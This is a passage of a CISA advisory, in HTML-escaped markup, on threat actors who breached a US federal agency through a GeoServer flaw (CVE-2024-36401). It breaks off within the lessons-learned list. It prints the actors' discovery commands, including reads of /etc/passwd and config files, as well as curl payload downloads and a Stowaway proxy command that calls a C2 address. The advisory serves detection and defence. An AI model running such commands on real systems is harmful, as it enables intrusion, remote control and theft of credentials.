&lt;p&gt;&lt;strong&gt;Roles:&lt;/strong&gt; &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/defensive-cybersecurity&quot; title=&quot;Defensive Cybersecurity Analysts&quot;&gt;Defensive Cybersecurity Analysts&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/vulnerability-analysis&quot; title=&quot;Vulnerability Analysts&quot;&gt;Vulnerability Analysts&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/systems-security-management&quot; title=&quot;Security Systems Managers&quot;&gt;Security Systems Managers&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/systems-security-analysis&quot; title=&quot;Systems Security Analysts&quot;&gt;Systems Security Analysts&lt;/a&gt;, and &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/cybersecurity-policy-and-planning&quot; title=&quot;Cybersecurity Policy and Planning Professionals&quot;&gt;Cybersecurity Policy and Planning Professionals&lt;/a&gt;.&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Download the PDF version of this report&lt;/td&gt;
&lt;td&gt;&lt;a class=&quot;c-button c-button--on-dark c-button--download&quot; href=&quot;https://www.cisa.gov/sites/default/files/2025-09/AA25-266A_advisory_cisa_shares_lessons_learned_from_ir_engagement.pdf&quot; title=&quot;PDF CISA Shares Lessons Learned from an Incident Response Engagement&quot;&gt;AA25-266A advisory cisa shares lessons learned from ir engagement&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to highlight lessons learned from an incident response engagement CISA conducted at a U.S. federal civilian executive branch (FCEB) agency. CISA is publicizing this advisory to reinforce the importance of prompt patching, as well as preparing for incidents by practicing incident response plans and by implementing logging and aggregating logs in a centralized out-of-band location. CISA is also raising awareness about the tactics, techniques, and procedures (TTPs) employed by these cyber threat actors to help organizations safeguard against similar exploits.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;CISA began incident response efforts at an FCEB agency after the agency identified potential malicious activity through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA discovered cyber threat actors compromised the agency by exploiting &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2024-36401&quot; target=&quot;_blank&quot; title=&quot;CVE-2024-36401&quot;&gt;CVE-2024-36401&lt;/a&gt; in a GeoServer about three weeks prior to the EDR alerts. Over the three-week period, the cyber threat actors gained separate initial access to a second GeoServer via the same vulnerability and moved laterally to two other servers.&lt;/p&gt;
&lt;p&gt;Leveraging insights CISA gleaned from the organization’s security posture and response, CISA is sharing lessons learned for organizations to mitigate similar compromises (see &lt;a href=&quot;#Lessons%20Learned&quot; title=&quot;Lessons Learned&quot;&gt;&lt;strong&gt;Lessons Learned&lt;/strong&gt;&lt;/a&gt; for more details):&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Vulnerabilities were not promptly remediated.&lt;/strong&gt;
&lt;ol&gt;
&lt;li&gt;The cyber threat actors exploited &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2024-36401&quot; target=&quot;_blank&quot; title=&quot;CVE-2024-36401&quot;&gt;CVE-2024-36401&lt;/a&gt; for initial access on two GeoServers.&lt;/li&gt;
&lt;li&gt;The vulnerability was disclosed 11 days prior to the cyber threat actors accessing the first GeoServer and 25 days prior to them accessing the second GeoServer.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The agency did not test or exercise their incident response plan (IRP), nor did their IRP enable them to promptly engage third parties and grant third parties access to necessary resources.&lt;/strong&gt;
&lt;ol&gt;
&lt;li&gt;This delayed&amp;nbsp;certain elements of CISA’s response as the IRP did not have procedures for involving third-party assistance or for granting third-party access to their security tools.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection.&lt;/strong&gt;
&lt;ol&gt;
&lt;li&gt;The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity earlier as they did not observe an alert from a GeoServer and the Web Server did not have endpoint protection.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;These lessons highlight strategies to effectively mitigate risk, enhance preparedness, and respond to incidents with greater efficiency. CISA encourages all organizations to consider the lessons learned and apply the associated recommendations in the &lt;a href=&quot;#Mitigations&quot; title=&quot;Mitigations&quot;&gt;&lt;strong&gt;Mitigations&lt;/strong&gt;&lt;/a&gt; section of this advisory to improve their security posture.&lt;/p&gt;
&lt;p&gt;This advisory also provides the cyber threat actors’ TTPs and indicators of compromise (IOCs). For a downloadable copy of IOCs, see:&lt;/p&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2025-09/AA25-266A-JSON.stix_.json&quot; title=&quot;JSON AA25-266A&quot;&gt;AA25-266A-JSON.stix_.json&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2025-09/AA25-266A-STIX.stix_.xml&quot; title=&quot;STIX AA25-266A&quot;&gt;AA25-266A-STIX.stix_.xml&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Technical Details&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This advisory uses the &lt;a href=&quot;https://attack.mitre.org/versions/v17/matrices/enterprise/&quot; target=&quot;_blank&quot; title=&quot;MITRE ATTACK Matrix for Enterprise&quot;&gt;MITRE ATT&amp;amp;CK&lt;sup&gt;®&lt;/sup&gt; Matrix for Enterprise&lt;/a&gt; framework, version 17. See the &lt;a href=&quot;#MITRE%20ATT&amp;amp;CK%20Tactics%20and%20Techniques&quot; title=&quot;MITRE ATT&amp;amp;CK Tactics and Techniques&quot;&gt;&lt;strong&gt;MITRE ATT&amp;amp;CK Tactics and Techniques&lt;/strong&gt;&lt;/a&gt; section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;amp;CK tactics and techniques.&lt;/p&gt;
&lt;h3&gt;Threat Actor Activity&lt;/h3&gt;
&lt;p&gt;CISA responded to a suspected compromise of a large FCEB agency after the agency’s security operations center (SOC) observed multiple endpoint security alerts.&lt;/p&gt;
&lt;p&gt;During the incident response, CISA discovered that cyber threat actors gained access to the agency’s network on July 11, 2024, by exploiting GeoServer vulnerability &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2024-36401&quot; target=&quot;_blank&quot; title=&quot;CVE 2024-36401&quot;&gt;CVE 2024-36401&lt;/a&gt; [&lt;a href=&quot;https://cwe.mitre.org/data/definitions/95.html&quot; target=&quot;_blank&quot; title=&quot;CWE-95: Eval Injection&quot;&gt;CWE-95: “Eval Injection”&lt;/a&gt;] on a public-facing GeoServer (GeoServer 1). This critical vulnerability, disclosed June 30, 2024, allows unauthenticated users to gain remote code execution (RCE) on affected GeoServer versions &lt;a href=&quot;#GeoServer&quot; title=&quot;Footnote Reference 1&quot;&gt;&lt;sup&gt;[1]&lt;/sup&gt;&lt;/a&gt;. The cyber threat actors used this vulnerability to download open source tools and scripts and establish persistence in the agency’s network. (CISA added this vulnerability to its &lt;a href=&quot;https://www.cisa.gov/known-exploited-vulnerabilities-catalog&quot; title=&quot;Known Exploited Vulnerabilities (KEV) Catalog&quot;&gt;Known Exploited Vulnerabilities (KEV) Catalog&lt;/a&gt; on July 15, 2024.)&lt;/p&gt;
&lt;p&gt;After gaining initial access to GeoServer 1, the cyber threat actors gained separate initial access to a second GeoServer (GeoServer 2) on July 24, 2024, by exploiting the same vulnerability. They moved laterally from GeoServer 1 to a web server (Web Server) and then a Structured Query Language (SQL) server. On each server, they uploaded (or attempted to upload) web shells such as &lt;a href=&quot;https://attack.mitre.org/software/S0020/&quot; target=&quot;_blank&quot; title=&quot;China Chopper&quot;&gt;China Chopper&lt;/a&gt;, along with scripts designed for remote access, persistence, command execution, and privilege escalation. The cyber threat actors also used &lt;a href=&quot;https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques&quot; title=&quot;living off the land (LOTL)&quot;&gt;living off the land (LOTL)&lt;/a&gt; techniques.&lt;/p&gt;
&lt;p&gt;See &lt;a href=&quot;#Figure%C2%A01.%20Overview%20of%20Threat%20Actor%20Activity&quot; title=&quot;Figure&amp;nbsp;1. Overview of Threat Actor Activity&quot;&gt;&lt;strong&gt;Figure 1&lt;/strong&gt;&lt;/a&gt; for an overview of the cyber threat actors’ activity and the following sections for detailed threat actors TTPs.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Figure&amp;nbsp;1. Overview of Threat Actor Activity&quot;&gt;Figure&amp;nbsp;1. Overview of Threat Actor Activity&lt;/a&gt;&lt;/p&gt;
  
  
  
  
&lt;figure class=&quot;c-figure c-figure--large c-figure--image&quot; role=&quot;group&quot;&gt;
  
  &lt;div class=&quot;c-figure__media&quot;&gt;  &lt;img loading=&quot;lazy&quot; src=&quot;/sites/default/files/styles/large/public/2025-09/Overview%20of%20Threat%20Actor%20Activity.jpg?itok=uRWN4aW3&quot; width=&quot;924&quot; height=&quot;457&quot; alt=&quot;Image outlining threat actor activity&quot;&gt;


&lt;/div&gt;
  &lt;/figure&gt;
&lt;h3&gt;Reconnaissance&lt;/h3&gt;
&lt;p&gt;The cyber threat actors identified &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2024-36401&quot; target=&quot;_blank&quot; title=&quot;CVE-2024-36401&quot;&gt;CVE-2024-36401&lt;/a&gt; in the organization’s public-facing GeoServer using Burp Suite Burp Scanner [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1595/002/&quot; target=&quot;_blank&quot; title=&quot;T1595.002&quot;&gt;T1595.002&lt;/a&gt;]. CISA detected this scanning activity by analyzing web logs and identifying signatures associated with the tool. Specifically, CISA observed domains linked to Burp Collaborator—a component of Burp Suite used for vulnerability detection—originating from the same IP address the cyber threat actors later used to exploit the GeoServer vulnerability for initial access.&lt;/p&gt;
&lt;h3&gt;Resource Development&lt;/h3&gt;
&lt;p&gt;The cyber threat actors used publicly available tools to conduct their malicious operations. In one instance, they gained remote access to the organization’s network and leveraged a commercially available virtual private server (VPS) from a cloud infrastructure provider [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1583/003/&quot; target=&quot;_blank&quot; title=&quot;T1583.003&quot;&gt;T1583.003&lt;/a&gt;].&lt;/p&gt;
&lt;h3&gt;Initial Access&lt;/h3&gt;
&lt;p&gt;To gain initial access to GeoServer 1 and GeoServer 2, the cyber threat actors exploited &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2024-36401&quot; target=&quot;_blank&quot; title=&quot;CVE 2024-36401&quot;&gt;CVE 2024-36401&lt;/a&gt; [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1190/&quot; target=&quot;_blank&quot; title=&quot;T1190&quot;&gt;T1190&lt;/a&gt;]. They leveraged this vulnerability to gain RCE by performing “eval injection,” a type of code injection that allows an untrusted user’s input to be evaluated as code. The cyber threat actors likely attempted to load a JavaScript extension to gain webserver information as an Apache wicket on GeoServer 1. However, their efforts were likely unsuccessful, as CISA observed attempts to access the &lt;code&gt;.js&lt;/code&gt; file returning &lt;code&gt;404&lt;/code&gt; responses in the web logs, indicating that the server could not find the requested URL.&lt;/p&gt;
&lt;h3&gt;Persistence&lt;/h3&gt;
&lt;p&gt;The cyber threat actors primarily used web shells [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1505/003/&quot; target=&quot;_blank&quot; title=&quot;T1505.003&quot;&gt;T1505.003&lt;/a&gt;] on internet-facing hosts, along with &lt;code&gt;cron&lt;/code&gt; jobs (scheduled commands that run automatically at specified times) [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1053/003/&quot; target=&quot;_blank&quot; title=&quot;T1053.003&quot;&gt;T1053.003&lt;/a&gt;], and valid accounts [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1078/&quot; target=&quot;_blank&quot; title=&quot;T1078&quot;&gt;T1078&lt;/a&gt;] for persistence. CISA also identified the creation of accounts—although these accounts were later deleted—with no evidence indicating further use.&lt;/p&gt;
&lt;h3&gt;Privilege Escalation&lt;/h3&gt;
&lt;p&gt;The cyber threat actors attempted to escalate privileges with the publicly available dirtycow tool &lt;a href=&quot;#dirtycow&quot; title=&quot;Footnote Reference 2&quot;&gt;&lt;sup&gt;[2]&lt;/sup&gt;&lt;/a&gt;, which can be used to exploit &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2016-5195&quot; target=&quot;_blank&quot; title=&quot;CVE-2016-5195&quot;&gt;CVE-2016-5195&lt;/a&gt; [&lt;a href=&quot;https://cwe.mitre.org/data/definitions/362.html&quot; target=&quot;_blank&quot; title=&quot;CWE-362: Race Condition&quot;&gt;CWE-362: “Race Condition”&lt;/a&gt;] [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1068/&quot; target=&quot;_blank&quot; title=&quot;T1068&quot;&gt;T1068&lt;/a&gt;]. After compromising web service accounts, they escalated their local privileges to transition away from these service accounts (it is unknown how they escalated privileges).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note: &lt;/strong&gt;&lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2016-5195&quot; target=&quot;_blank&quot; title=&quot;CVE-2016-5195&quot;&gt;CVE-2016-5195&lt;/a&gt; affects Linux kernel 2.x through 4.x before 4.8.3 and allows users to escalate privileges. CISA added this CVE to its KEV Catalog on March 3, 2022.&lt;/p&gt;
&lt;h3&gt;Defense Evasion&lt;/h3&gt;
&lt;p&gt;To evade detection, the cyber threat actors employed indirect command execution via &lt;code&gt;.php&lt;/code&gt; web shells and &lt;code&gt;xp_cmdshell&lt;/code&gt; [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1202/&quot; target=&quot;_blank&quot; title=&quot;T1202&quot;&gt;T1202&lt;/a&gt;] and abused Background Intelligence Transfer Service (BITS) jobs [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1197/&quot; target=&quot;_blank&quot; title=&quot;T1197&quot;&gt;T1197&lt;/a&gt;]. CISA also observed files on GeoServer 1 named &lt;code&gt;RinqQ.exe&lt;/code&gt; and &lt;code&gt;RingQ.rar&lt;/code&gt;, which likely refer to a publicly available defense evasion tool called RingQ &lt;a href=&quot;#RingQ&quot; title=&quot;Footnote Reference 3&quot;&gt;&lt;sup&gt;[3]&lt;/sup&gt;&lt;/a&gt;, that the cyber threat actors staged for potential use.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note: &lt;/strong&gt;CISA could not recover most of the files on the host to confirm their contents.&lt;/p&gt;
&lt;h3&gt;Credential Access&lt;/h3&gt;
&lt;p&gt;Once inside the organization’s network, the cyber threat actors primarily relied on brute force techniques [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1110/&quot; target=&quot;_blank&quot; title=&quot;T1110&quot;&gt;T1110&lt;/a&gt;] to obtain passwords for lateral movement and privilege escalation. They also accessed service accounts by exploiting their associated services.&lt;/p&gt;
&lt;h3&gt;Discovery&lt;/h3&gt;
&lt;p&gt;After gaining initial access, the cyber threat actors conducted discovery to facilitate lateral movement. They performed ping sweeps of hosts within specific subnets [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1018/&quot; target=&quot;_blank&quot; title=&quot;T1018&quot;&gt;T1018&lt;/a&gt;] and downloaded the &lt;code&gt;fscan&lt;/code&gt; tool &lt;a href=&quot;#fscan&quot; title=&quot;Footnote Reference 4&quot;&gt;&lt;sup&gt;[4]&lt;/sup&gt;&lt;/a&gt; to scan the organization’s network. CISA identified the use of the &lt;code&gt;fscan&lt;/code&gt; tool by analyzing evidence of its output found on disk. (&lt;strong&gt;Note:&amp;nbsp;&lt;/strong&gt;&lt;code&gt;fscan&lt;/code&gt; is publicly available on GitHub and is capable of port scanning, fingerprinting, and web vulnerability detection—among other functions.) Between July 15 and 31, 2024, the cyber threat actors conducted extensive network and vulnerability scanning using &lt;code&gt;fscan&lt;/code&gt; and &lt;code&gt;linux-exploit-suggester2.pl.&lt;/code&gt; CISA’s host forensics analysts uncovered this activity by reviewing remnants the cyber threat actors left on disk.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;GeoServer 1&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;The cyber threat actors leveraged &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2024-36401&quot; target=&quot;_blank&quot; title=&quot;CVE-2024-36401&quot;&gt;CVE-2024-36401&lt;/a&gt; to execute the following host discovery commands on GeoServer 1:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;uname-a&lt;/li&gt;
&lt;li&gt;df-h&lt;/li&gt;
&lt;li&gt;env&lt;/li&gt;
&lt;li&gt;ps -aux&lt;/li&gt;
&lt;li&gt;ipconfig [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1016/&quot; target=&quot;_blank&quot; title=&quot;T1016&quot;&gt;T1016&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;date&lt;/li&gt;
&lt;li&gt;who -b&lt;/li&gt;
&lt;li&gt;rpm -qa polkit&lt;/li&gt;
&lt;li&gt;netstat -ano [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1049/&quot; target=&quot;_blank&quot; title=&quot;T1049&quot;&gt;T1049&lt;/a&gt;]&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Additionally, they employed LOTL techniques for user, service, filesystem, and network discovery on GeoServer 1:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;cat /etc/passwd [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1087/001/&quot; target=&quot;_blank&quot; title=&quot;T1087.001&quot;&gt;T1087.001&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;cat /etc/resolv.conf&lt;/li&gt;
&lt;li&gt;cat /usr/local/apache-tomcat-9.0.89/webapps/geoserver/WEB-INF/web.xml&lt;/li&gt;
&lt;li&gt;cat /etc/redhat-release [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1082/&quot; target=&quot;_blank&quot; title=&quot;T1082&quot;&gt;T1082&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;cat /etc/os-release&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The cyber threat actors then used &lt;code&gt;curl&lt;/code&gt; commands to download a shell script named &lt;code&gt;mm.sh&lt;/code&gt; (which they renamed to &lt;code&gt;aa.sh&lt;/code&gt;) and a zip file named &lt;code&gt;aaa.zip&lt;/code&gt; to the &lt;code&gt;/tmp/&lt;/code&gt; directory.&lt;/p&gt;
&lt;p&gt;Subsequently, they enumerated the internal network from GeoServer 1, identifying Secure Shell (SSH) listeners, File Transfer Protocol (FTP) servers, file servers, and web servers [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1046/&quot; target=&quot;_blank&quot; title=&quot;T1046&quot;&gt;T1046&lt;/a&gt;] by using the &lt;code&gt;fscan&lt;/code&gt; tool. (&lt;strong&gt;Note:&lt;/strong&gt; CISA observed endpoint logs that showed the cyber threat actors uploaded &lt;code&gt;fscan&lt;/code&gt; to the compromised host and ran it against internal systems.) The actors then attempted to brute force login credentials for the exploited web services to gain remote access, achieve RCE, or move laterally.&lt;/p&gt;
&lt;p&gt;The cyber threat actors also conducted ping sweeps of several hosts within the organization’s internal subnets using &lt;code&gt;fscan&lt;/code&gt;. Their use of the &lt;code&gt;-nobr&lt;/code&gt; and &lt;code&gt;-nopoc&lt;/code&gt; flags for &lt;code&gt;fscan&lt;/code&gt; indicated that this scan excluded brute forcing or vulnerability scanning, respectively.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;SQL Server&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;CISA observed the following discovery commands on the organization’s SQL server:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;whoami [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1033/&quot; target=&quot;_blank&quot; title=&quot;T1033&quot;&gt;T1033&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;ipconfig /all&lt;/li&gt;
&lt;li&gt;ping -n 1 8.8.8.8&lt;/li&gt;
&lt;li&gt;systeminfo&lt;/li&gt;
&lt;li&gt;tasklist [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1057/&quot; target=&quot;_blank&quot; title=&quot;T1057&quot;&gt;T1057&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;dir c:\ [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1083/&quot; target=&quot;_blank&quot; title=&quot;T1083&quot;&gt;T1083&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;dir c:\Users&lt;/li&gt;
&lt;li&gt;type c:\Last.txt&lt;/li&gt;
&lt;li&gt;type c:\inetpub\wwwroot&lt;/li&gt;
&lt;li&gt;type c:\inetpub\&lt;/li&gt;
&lt;li&gt;dir c:\inetpub\wwwroot&lt;/li&gt;
&lt;li&gt;dir c:\&lt;/li&gt;
&lt;li&gt;dir c:\ifwapps&lt;/li&gt;
&lt;li&gt;dir d:\&lt;/li&gt;
&lt;li&gt;dir e:\&lt;/li&gt;
&lt;li&gt;net group &quot;domain admins&quot; /domain&lt;/li&gt;
&lt;li&gt;type C:\Windows\System32\inetsrv\config\applicationHost.config&lt;/li&gt;
&lt;li&gt;dir c:\ifwapps\Tier1Utilities&lt;/li&gt;
&lt;li&gt;netstat -ano&lt;/li&gt;
&lt;li&gt;curl&lt;/li&gt;
&lt;li&gt;net user&lt;/li&gt;
&lt;li&gt;tasklist&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;GeoServer 2&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Based on images CISA received of GeoServer 2, CISA observed the bash history of a user that showed the use of Burp Collaborator to execute encoded host and network discovery commands.&lt;/p&gt;
&lt;h3&gt;Lateral Movement&lt;/h3&gt;
&lt;p&gt;In one instance, the cyber threat actors moved laterally from the Web Server to the SQL Server by enabling &lt;code&gt;xp_cmdshell&lt;/code&gt; for RCE on GeoServer 1.&lt;/p&gt;
&lt;h3&gt;Command and Control&lt;/h3&gt;
&lt;p&gt;The cyber threat actors used PowerShell [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1059/001/&quot; target=&quot;_blank&quot; title=&quot;T1059.001&quot;&gt;T1059.001&lt;/a&gt;] and &lt;code&gt;bitsadmin getfile&lt;/code&gt; to download payloads [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1105/&quot; target=&quot;_blank&quot; title=&quot;T1105&quot;&gt;T1105&lt;/a&gt;].&amp;nbsp;&lt;/p&gt;
&lt;p&gt;They used Stowaway &lt;a href=&quot;#Stowaway&quot; title=&quot;Footnote Reference 5&quot;&gt;[5]&lt;/a&gt;, a publicly available multi-level proxy tool, to establish C2 [&lt;a href=&quot;https://attack.mitre.org/versions/v17/techniques/T1090/&quot; target=&quot;_blank&quot; title=&quot;T1090&quot;&gt;T1090&lt;/a&gt;]. Stowaway enabled the cyber threat actors to bypass the organization’s intranet restrictions and access internal network resources by forwarding traffic from their C2 server through the Web Server. They wrote Stowaway to disk using a &lt;code&gt;tomcat&lt;/code&gt; service account.&lt;/p&gt;
&lt;p&gt;The actors then executed Stowaway via &lt;code&gt;/var/tmp/agent -c 45.32.22[.]62:4441 -s f86bc7ff68aff3ad –up http –reconnect 10&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;To test their level of access, the cyber threat actors performed a ping sweep of multiple hosts in a particular subnet of the organization’s network. Next, the cyber threat actors downloaded a modified version of Stowaway using a &lt;code&gt;curl&lt;/code&gt; command, successfully establishing an outbound connection with their C2 server using &lt;code&gt;HTTP&lt;/code&gt; over &lt;code&gt;TCP/4441&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;On July 14, 2024, the cyber threat actors executed &lt;code&gt;/tmp/mm.sh&lt;/code&gt; on the Web Server followed by an encoded command to execute Stowaway. The contents of this file could not be recovered. Additionally, they used Stowaway to establish a second C2 connection over &lt;code&gt;TCP/50012&lt;/code&gt;, likely serving as a backup C2 channel.&lt;/p&gt;
&lt;p&gt;CISA discovered evidence of various files hosted on the C2 server, including numerous publicly available tools and scripts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;RingQ antivirus defense evasion tool (&lt;code&gt;RingQ.exe&lt;/code&gt;, &lt;code&gt;RingQ.rar&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;IOX proxy tool (&lt;code&gt;iox.rar&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;BusyBox trojan multi-tool (&lt;code&gt;busybox&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;WinRAR archive tool (&lt;code&gt;Rar.exe&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Stowaway proxy tool (&lt;code&gt;agent&lt;/code&gt;, &lt;code&gt;agent.tar&lt;/code&gt;, &lt;code&gt;agent.zip&lt;/code&gt;, &lt;code&gt;agentu.exe&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Web shells (&lt;code&gt;Handx.ashx&lt;/code&gt;, &lt;code&gt;start_tomcat.jsp&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Various shell scripts (&lt;code&gt;mm.sh&lt;/code&gt;, &lt;code&gt;t.py&lt;/code&gt;, &lt;code&gt;t1.sh&lt;/code&gt;, &lt;code&gt;c.bat&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Detection&lt;/h3&gt;
&lt;p&gt;The cyber threat actors remained undetected in the organization’s environment for three weeks before the organization’s SOC identified the compromise using their EDR tool. On July 31, 2024, their EDR tool identified a&amp;nbsp;&lt;code&gt;1.txt&lt;/code&gt; file uploaded as suspected malware on the SQL Server. The SOC responded to additional alerts when the cyber threat actors transferred&amp;nbsp;&lt;code&gt;1.txt&lt;/code&gt; to the SQL Server through&amp;nbsp;&lt;code&gt;bitsadmin&lt;/code&gt; after attempting other LOTL techniques, such as leveraging PowerShell and&amp;nbsp;&lt;code&gt;certutil&lt;/code&gt;. The alerts&amp;nbsp;generated by this activity on the SQL server prompted the SOC to contain the server, initiate an investigation, request assistance from CISA, and uncover malicious activity on GeoServer 1.&lt;/p&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Lessons Learned&quot;&gt;&lt;strong&gt;Lessons Learned&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;CISA is sharing the following lessons learned based on what CISA learned about the organization’s security posture through incident detection and response activities.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Vulnerabilities were not promptly remediated&lt;/strong&gt;.
&lt;ol&gt;
&lt;li&gt;The cyber threat actors exploited &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2024-36401&quot; target=&quot;_blank&quot; title=&quot;CVE-2024-36401&quot;&gt;CVE-2024-36401&lt;/a&gt; for initial access on two GeoServers.&lt;/li&gt;
&lt;li&gt;The vulnerability was disclosed June 30, 2024, and the cyber threat actors exploited it for initial access to GeoServer 1 on July 11, 2024.&lt;/li&gt;
&lt;li&gt;The vulnerability was added to CISA’s KEV Catalog on July 15, 2024, and by July 24, 2024, the vulnerability was not patched when the cyber threat actors exploited it for access to GeoServer 2.
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Note:&lt;/strong&gt; FCEB agencies are required to remediate vulnerabilities in CISA’s KEV Catalog within prescribed timeframes under &lt;a href=&quot;https://www.cisa.gov/news-events/directives/binding-operational-directive-22-01&quot; title=&quot;Binding Operational Directive (BOD) 22-01&quot;&gt;Binding Operational Directive (BOD) 22-01&lt;/a&gt;. July 24, 2024, was within the KEV-required patching window for this CVE. However, CISA encourages FCEB agencies and critical infrastructure organizations to address KEV catalog vulnerabilities immediately as part of their vulnerability management plan.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The agency did not test or exercise their IRP, nor did their IRP enable them to promptly engage third parties and grant third parties’ access to necessary resources&lt;/strong&gt;.
&lt;ol&gt;
&lt;li&gt;On Aug. 1, 2024, upon discovering the endpoint alerts, the agency conducted remote triage of affected systems and used their EDR tool to contain the intrusion.
&lt;ol&gt;
&lt;li&gt;After containment, the agency engaged CISA to investigate potential threat actor persistence in their environment.&lt;/li&gt;
&lt;li&gt;Their IRP did not have procedures for bringing in third parties for assistance, which hampered CISA’s efforts to respond to the incident quickly and efficiently.
&lt;ol&gt;
&lt;li&gt;The agency could not provide CISA remote access to their security information and event management (SIEM) tool, which initially kept CISA from reviewing all available logs, hindering CISA’s analysis.&lt;/li&gt;
&lt;li&gt;The agency had to go through their change control board process before CISA could deploy their EDR agents.&lt;/li&gt;
&lt;li&gt;The agency could have proactively identified these roadblocks by testing their IRP, such as via a tabletop exercise, but had not tested their plan for a long period.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
